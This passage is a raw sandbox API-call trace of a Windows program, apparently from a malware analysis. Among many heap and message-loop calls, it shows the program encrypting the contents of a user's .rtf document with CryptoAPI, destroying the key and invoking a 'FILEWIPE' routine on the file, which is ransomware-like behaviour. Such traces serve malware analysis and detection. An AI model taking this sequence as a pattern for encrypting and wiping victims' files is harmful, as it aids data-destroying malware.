hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.871] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.872] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.872] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.872] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.872] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.872] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.872] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.872] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.872] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.872] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.873] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.873] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.873] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.873] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.873] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.873] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.873] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.873] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.873] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.873] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.873] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.873] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.877] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1084f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x10850) returned 1 [0179.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.878] CharLowerBuffW (in: lpsz="byte[67665]", cchLength=0xb | out: lpsz="byte[67665]") returned 0xb [0179.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.878] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.878] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.879] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6f860*, pdwDataLen=0x87e820*=0x1084f, dwBufLen=0x10850 | out: pbData=0xa6f860*, pdwDataLen=0x87e820*=0x10850) returned 1 [0179.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.880] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.880] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.880] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.880] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.880] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.880] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.880] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.880] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.880] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.880] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.886] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.892] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.892] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.892] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0179.892] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.892] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.892] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0179.892] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.892] CryptDestroyKey (hKey=0x90af18) returned 1 [0179.893] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.893] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.893] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.893] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.893] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0179.893] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0179.893] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.893] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0179.893] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.893] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.893] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.893] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.893] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.893] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.893] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.894] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.894] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.894] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.894] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.894] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.894] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0179.894] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.894] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.894] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0179.894] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.894] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0179.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.894] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0179.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.898] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0179.898] FreeLibrary (hLibModule=0x74f20000) returned 1 [0179.898] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.898] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.898] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.902] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.904] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.906] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.906] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0179.906] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.907] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.907] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6682b0, ftCreationTime.dwHighDateTime=0x1d5e6a8, ftLastAccessTime.dwLowDateTime=0x8ad0cf40, ftLastAccessTime.dwHighDateTime=0x1d5d902, ftLastWriteTime.dwLowDateTime=0x8ad0cf40, ftLastWriteTime.dwHighDateTime=0x1d5d902, nFileSizeHigh=0x0, nFileSizeLow=0x1084f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="YNSVRvaq.rtf", cAlternateFileName="")) returned 0x90af58 [0179.907] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0179.907] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0179.908] CharLowerBuffW (in: lpsz="byte[67663]", cchLength=0xb | out: lpsz="byte[67663]") returned 0xb [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 